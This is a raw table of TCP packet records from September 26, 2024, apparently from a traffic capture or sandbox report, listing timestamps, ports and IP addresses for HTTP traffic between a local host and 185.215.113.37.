Sep 26, 2024 22:40:17.239907026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239907980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239923000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239938021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239939928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239967108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.239968061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239984989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.239985943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240003109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240016937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240029097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240044117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240044117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240044117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240057945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240073919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240087986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240089893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240107059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240108013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240123987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240159988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240159988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240183115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240185976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240214109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240230083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240232944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240245104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240253925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240261078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240262985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240268946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240283966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240303040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240303040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240328074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240345955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240420103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240434885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240452051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240468025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240468025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240483046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240492105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240525961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240540028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240555048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240562916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240570068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240586042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.240587950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240603924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240624905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.240643024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.329663992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.329709053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.329778910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.329780102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368367910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368463039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368479013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368505955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368521929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368550062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368566036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368580103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368582964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368601084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368618965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368633986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368658066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368688107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368710995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368726015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368741035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368758917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368773937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368776083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368791103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368793011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368807077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368820906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368823051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368838072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368848085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368868113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368886948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368927956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368943930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368959904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368978024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.368989944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.368993998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369009972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369018078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369060993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369060993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369076967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369090080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369105101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369122982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369132996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369143009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369148970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369163036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369167089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369183064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369201899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369204044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369204044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369204044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369226933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369244099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369308949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369323969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369339943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369355917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369359016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369376898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369383097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369383097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369394064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369401932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369415045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369422913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369442940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369458914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369462013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369611979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369627953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369645119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369659901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369662046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369678020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369683027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369693995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369703054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369709969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369721889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369726896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369740963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369761944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369770050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369771004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369779110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369795084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369811058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369823933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369832039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369856119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369864941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369873047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369888067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369891882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369891882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369906902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369920015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369925976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369940042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369940996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369957924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.369959116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369976044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369992018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.369997025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370007038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370021105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370021105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370021105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370023966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370049953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370049953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370049953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370064974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370070934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370081902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370090961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370099068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370107889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370115995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370125055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370131016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370145082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370146990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370162964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370178938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370191097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370192051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370192051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370197058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370215893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370223999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370223999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370233059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370243073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370261908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370280027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370383024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370395899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370410919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370441914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370462894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370484114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370497942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370512962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370528936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370546103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370549917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370560884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.370577097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370595932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.370624065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.497853994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.497874022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.497905016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.497927904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.497946024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.497996092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498013973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498019934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498029947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498047113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498106003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498106003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498109102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498125076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498138905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498155117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498169899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498187065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498200893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498214006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498224974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498234034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498246908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498250008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498279095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498290062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498296976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498311996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498328924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498334885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498353004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498374939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498399973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498414993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498430967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498451948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498455048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498471975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498481035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498487949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498496056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498512030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498528004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498538017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498538017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498553038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498560905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498568058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498586893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498603106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498606920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498620987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498630047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498635054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498655081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498708963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498709917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498730898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498747110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498763084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498766899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498780966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498788118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498797894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498810053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498814106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498837948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498850107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498855114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498869896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498869896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498887062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498899937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.498903036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.498949051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499001026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499017954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499033928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499048948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499062061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499064922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499080896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499082088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499119997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499150991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499155045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499175072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499191046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499205112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499221087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499238014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499248981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499253988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499269009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499278069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499284983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499300003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499300957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499316931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499329090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499346018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499397993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499731064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499746084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499759912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499784946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499800920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499803066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499816895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499833107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499840021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499846935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499861002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499866009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499878883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499893904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499900103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:17.499910116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:17.499924898 CEST	80	49730	185.215.113.37	192.168.2.4
